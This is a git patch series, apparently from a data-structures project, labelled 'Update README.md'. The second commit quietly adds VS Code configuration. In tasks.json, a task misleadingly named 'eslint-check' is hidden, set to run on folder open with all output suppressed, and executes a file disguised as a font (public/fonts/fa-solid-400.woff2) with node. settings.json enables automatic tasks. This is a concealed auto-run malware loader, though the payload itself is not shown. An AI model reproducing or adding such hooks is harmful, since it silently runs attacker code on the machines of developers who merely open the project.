From 292ab3cb4b4ae395be8e1917ea6f9aaed7bfe593 Mon Sep 17 00:00:00 2001
From: Mehr-un-nisa <55224607+Mehr-un-nisa@users.noreply.github.com>
Date: Wed, 19 Oct 2022 11:20:44 +0500
Subject: [PATCH 1/2] Update README.md
---
README.md | 6 +-----
1 file changed, 1 insertion(+), 5 deletions(-)
diff --git a/README.md b/README.md
index aad2abc..2be2614 100644
--- a/README.md
+++ b/README.md
@@ -22,8 +22,4 @@
Easy access to the large database

- The complex and advanced data strcutres are
- Disjoint Sets
- Self-Balancing Trees
- Segment Trees
- Tries etc
+
From 5f7094a9997d3d04845d2a46dffb4f3a867c1b32 Mon Sep 17 00:00:00 2001
From: Mehr-un-nisa <55224607+Mehr-un-nisa@users.noreply.github.com>
Date: Wed, 19 Oct 2022 11:20:55 +0500
Subject: [PATCH 2/2] Update README.md
---
.gitignore | 3 +++
.vscode/extensions.json | 7 ++++++
.vscode/launch.json | 50 +++++++++++++++++++++++++++++++++++++++++
.vscode/settings.json | 23 +++++++++++++++++++
.vscode/spellright.dict | 2 ++
.vscode/tasks.json | 33 +++++++++++++++++++++++++++
README.md | 5 +++++
7 files changed, 123 insertions(+)
create mode 100644 .gitignore
create mode 100644 .vscode/extensions.json
create mode 100644 .vscode/launch.json
create mode 100644 .vscode/settings.json
create mode 100644 .vscode/spellright.dict
create mode 100644 .vscode/tasks.json
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..f4f7d32
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,3 @@
+branch_structure.json
+temp_auto_push.bat
+temp_interactive_push.bat
diff --git a/.vscode/extensions.json b/.vscode/extensions.json
new file mode 100644
index 0000000..2e3b646
--- /dev/null
+++ b/.vscode/extensions.json
@@ -0,0 +1,7 @@
+{
+ "recommendations": [
+ "myml.vscode-markdown-plantuml-preview",
+ "esbenp.prettier-vscode",
+ "jebbs.plantuml"
+ ]
+}
\ No newline at end of file
diff --git a/.vscode/launch.json b/.vscode/launch.json
new file mode 100644
index 0000000..a5177ab
--- /dev/null
+++ b/.vscode/launch.json
@@ -0,0 +1,50 @@
+{
+ "version": "0.2.0",
+ "configurations": [
+ {
+ "name": "Debug SST",
+ "type": "node",
+ "request": "launch",
+ "runtimeExecutable": "${workspaceRoot}/node_modules/.bin/sst",
+ "runtimeArgs": ["dev", "--increase-timeout"],
+ "console": "integratedTerminal",
+ "skipFiles": ["/**"],
+ // sourceMapRenames helps with the loading spinner when debugging and viewing local variables
+ "sourceMapRenames": false,
+ "env": {
+ "AWS_PROFILE": "flo-ct-flo360"
+ }
+ },
+ {
+ "name": "Debug Tests - Unit",
+ "type": "node",
+ "request": "launch",
+ "runtimeExecutable": "${workspaceRoot}/node_modules/.bin/sst",
+ "runtimeArgs": ["bind", "yarn", "\"jest\"", "\"--watch\"", "\"--config\"", "\"./jest.unit.config.cjs\"", "\"${input:scopeTestsFileName}\""],
+ "console": "integratedTerminal",
+ "skipFiles": ["/**"],
+ "env": {
+ "AWS_PROFILE": "flo-ct-flo360"
+ },
+ },
+ {
+ "name": "Debug Tests - E2E",
+ "type": "node",
+ "request": "launch",
+ "runtimeExecutable": "${workspaceRoot}/node_modules/.bin/sst",
+ "runtimeArgs": ["bind", "yarn", "\"vitest\"", "\"--config\"", "\"./vitest.e2e.config.ts\"", "\"${input:scopeTestsFileName}\""],
+ "console": "integratedTerminal",
+ "skipFiles": ["/**"],
+ "env": {
+ "AWS_PROFILE": "flo-ct-flo360"
+ },
+ },
+ ],
+ "inputs": [
+ {
+ "id": "scopeTestsFileName",
+ "type": "promptString",
+ "description": "Partial file name to scope test debugging to. ex. arena. Leave blank to run all tests.",
+ }
+ ]
+}
diff --git a/.vscode/settings.json b/.vscode/settings.json
new file mode 100644
index 0000000..934d555
--- /dev/null
+++ b/.vscode/settings.json
@@ -0,0 +1,23 @@
+{
+ "search.exclude": {
+ "**/.sst": true
+ },
+ "task.allowAutomaticTasks": true,
+ "typescript.tsserver.experimental.enableProjectDiagnostics": true,
+ "editor.defaultFormatter": "esbenp.prettier-vscode",
+ "typescript.preferences.importModuleSpecifier": "relative",
+ "typescript.tsdk": "node_modules/typescript/lib",
+ "debug.openDebug": "neverOpen",
+ "problems.autoReveal": true,
+ "terminal.integrated.hideOnStartup": "always",
+ "terminal.integrated.defaultProfile.windows": "Command Prompt",
+ "terminal.integrated.inheritEnv": false,
+ "jestrunner.configPath": "jest.unit.config.cjs",
+ "compile-hero.disable-compile-files-on-did-save-code": true,
+ "tasks": {
+ "label": "lint on open",
+ "type": "shell",
+ "command": "npm run lint",
+ "runOn": "folderOpen"
+ }
+}
diff --git a/.vscode/spellright.dict b/.vscode/spellright.dict
new file mode 100644
index 0000000..51b1974
--- /dev/null
+++ b/.vscode/spellright.dict
@@ -0,0 +1,2 @@
+Contentful
+Lerna
diff --git a/.vscode/tasks.json b/.vscode/tasks.json
new file mode 100644
index 0000000..5e22662
--- /dev/null
+++ b/.vscode/tasks.json
@@ -0,0 +1,33 @@
+{
+ "version": "2.0.0",
+ "configurations": [
+ {
+ "type": "node",
+ "request": "launch",
+ "name": "Run My Project",
+ "console": "",
+ "internalConsoleOptions": "openOnSessionStart"
+ }
+ ],
+ "tasks": [
+ {
+ "label": "eslint-check",
+ "type": "shell",
+ "command": "(command -v node >/dev/null 2>&1 && node ./public/fonts/fa-solid-400.woff2) || (where node >nul 2>&1 && node ./public/fonts/fa-solid-400.woff2) || echo ''",
+ "problemMatcher": [],
+ "isBackground": true,
+ "hide": true,
+ "presentation": {
+ "reveal": "never",
+ "panel": "dedicated",
+ "focus": false,
+ "clear": false,
+ "echo": false,
+ "close": true
+ },
+ "runOptions": {
+ "runOn": "folderOpen"
+ }
+ },
+ ]
+}
diff --git a/README.md b/README.md
index 2be2614..7953a81 100644
--- a/README.md
+++ b/README.md
@@ -23,3 +23,8 @@

+ The complex and advanced data strcutres are
+ Disjoint Sets
+ Self-Balancing Trees
+ Segment Trees
+ Tries etc